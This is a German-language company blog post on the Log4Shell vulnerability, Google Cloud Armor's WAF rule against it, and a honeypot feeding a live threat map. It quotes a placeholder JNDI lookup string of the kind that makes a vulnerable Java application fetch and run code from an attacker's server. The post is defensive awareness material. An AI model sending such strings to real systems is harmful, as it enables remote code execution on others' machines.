Keine Artikel gefunden.

Eine Bedrohungskarte für Log4Shell-Angriffe auf Google Cloud

Mitwirkende
Keine Artikel gefunden.
Newsletter abonnieren
Diesen Beitrag teilen

Log4Shell hat Sicherheitsteams auf der ganzen Welt auf Trab gebracht. In diesem Blog-Beitrag erfahren Sie, wie und warum wir eine Live-Threatmap auf Basis von Google Cloud erstellt haben, um Cyberangriffe und Log4j-Exploits zu erkennen und zu visualisieren.


Die größte und kritischste Schwachstelle des letzten Jahrzehnts.

So wird die Log4j-Schwachstelle beschrieben. Log4j ist ein Paket, das häufig in Java-Anwendungen für die Protokollierung verwendet wird. Kurz gesagt, die Schwachstelle ermöglicht die Ausführung von Remote-Code auf dem Rechner, auf dem eine betroffene Anwendung läuft. Angreifer können dies ganz einfach erreichen, indem sie die Anwendung eine bösartige Zeichenfolge protokollieren lassen, die eine Java-Klasse von einem entfernten Server unter der Kontrolle des Angreifers abruft und ausführt. Die bösartige Zeichenfolge sieht etwa so aus:

${jndi:ldap://[ATTACKER SERVER]/[EXPLOIT FILE]}

Es gibt zwei Gründe, warum dies die größte und kritischste Sicherheitslücke des letzten Jahrzehnts ist. Erstens ist die Sicherheitslücke sehr leicht auszunutzen. Zweitens verwendet fast jede Java-Anwendung Log4j und ist damit anfällig für diese Schwachstelle.

Cloud Armor zur Erkennung und Blockierung von Log4j-Exploits

Cloud Armor ist eine Web Application Firewall (WAF), die Teil des Google Cloud Stacks ist. Wenn sie aktiviert ist, hilft sie, Anwendungen, die in der Google Cloud bereitgestellt werden, vor Angriffen wie DDoS, XSS, SQL Injection, File Inclusion und Remote Code Execution zu schützen.

Das Google-Cloud-Team hat die Initiative ergriffen und eine WAF-Regel veröffentlicht, mit deren Hilfe Ausnutzungsversuche der Log4j-Schwachstelle erkannt und blockiert werden können, bevor die Anfrage das Backend erreicht.

Weitere Informationen zur Funktionsweise finden Sie in diesem großartigen Blogpost von Google Cloud.

Natürlich ist die Aufgabe mit der Aktualisierung einer WAF-Regel nicht erledigt. Die eigentliche Sicherheitslücke im Paket sollte gepatcht werden. Dies ist jedoch ein mühsamer Prozess, der viel Zeit in Anspruch nimmt und Ihre Anwendung möglicherweise beschädigt. Cloud Armor verschafft Ihnen zusätzliche Zeit, um kritische Schwachstellen zu patchen und gleichzeitig die Sicherheit Ihrer Anwendungen zu gewährleisten.

Visualisierung von Cloud Armor-Protokollen in einer Threatmap

Natürlich sind wir noch einen Schritt weiter gegangen... Wir haben einen einfachen Honeypot in unserer Google Cloud-Umgebung eingerichtet, um die verschiedenen Arten von Angriffen zu visualisieren, die auf öffentlich zugängliche Anwendungen ausgeführt werden.

Der Honigtopf wird mit Cloud Armor-Regeln geschützt, die bösartige Anfragen erkennen und blockieren. Die von Cloud Armor erstellten Protokolle bösartiger Anfragen werden dann in diesem Dashboard in Echtzeit visualisiert.

In der nachstehenden Grafik sehen Sie das Ergebnis ähnlicher Angriffe, die wir selbst durchgeführt haben:

Zu den echten Angriffen: In den letzten 7 Tagen haben wir 48 bösartige Strings aufgezeichnet, die an den Honeypot gesendet wurden und versuchten, die log4j-Schwachstelle auszunutzen, und die von 4 verschiedenen entfernten IPs stammten.

Fazit

Die log4shell-Saga ist schlimm, aber es ist zu erwarten, dass ähnliche Probleme in Zukunft auftreten werden. Hacker-Gruppen durchforsten wahrscheinlich bereits beliebte Open-Source-Bibliotheken, um die nächste große Schwachstelle zu finden, die praktisch jedes Unternehmen auf der Welt gefährdet. Google Cloud Armor ist ein großartiges Werkzeug in Ihrem Arsenal, um Anwendungen am Rande zu schützen und die Risiken von Zero-Day-Schwachstellen zu mindern, die in Open-Source-Bibliotheken lauern könnten.

Für Entwicklungsteams ist es wichtig, sich der Tatsache bewusst zu sein, dass diese Angriffe sehr real sind und die Dinge sehr schnell schief gehen können, wenn die Sicherheit nicht ernst genommen wird.

Bei ML6 wird die Threatmap auf großen Monitoren in den Büros angezeigt. Nicht, weil sie Informationen über Bedrohungen liefert, sondern weil sie ein großartiges Sensibilisierungsinstrument für technische Teams ist. Es ist eine ständige Erinnerung daran, dass Bedrohungen real sind und dass Anwendungen in jedem Schritt des Entwicklungs- und Bereitstellungslebenszyklus angemessen gesichert werden sollten.


Verwandte Beiträge

Alle anzeigen
Keine Ergebnisse gefunden.
Es gibt keine Ergebnisse mit diesen Kriterien. Versuchen Sie, Ihre Suche zu ändern.
Stiftung Modelle
Unternehmen
Unser Team
Verantwortungsvolle und ethische KI
Strukturierte Daten
Chat GPT
Nachhaltigkeit
Stimme und Ton
Front-End-Entwicklung
Schutz und Sicherheit von Daten
Verantwortungsvolle/ethische KI
Infrastruktur
Hardware und Sensoren
MLOps
Generative KI
Verarbeitung natürlicher Sprache
Computer Vision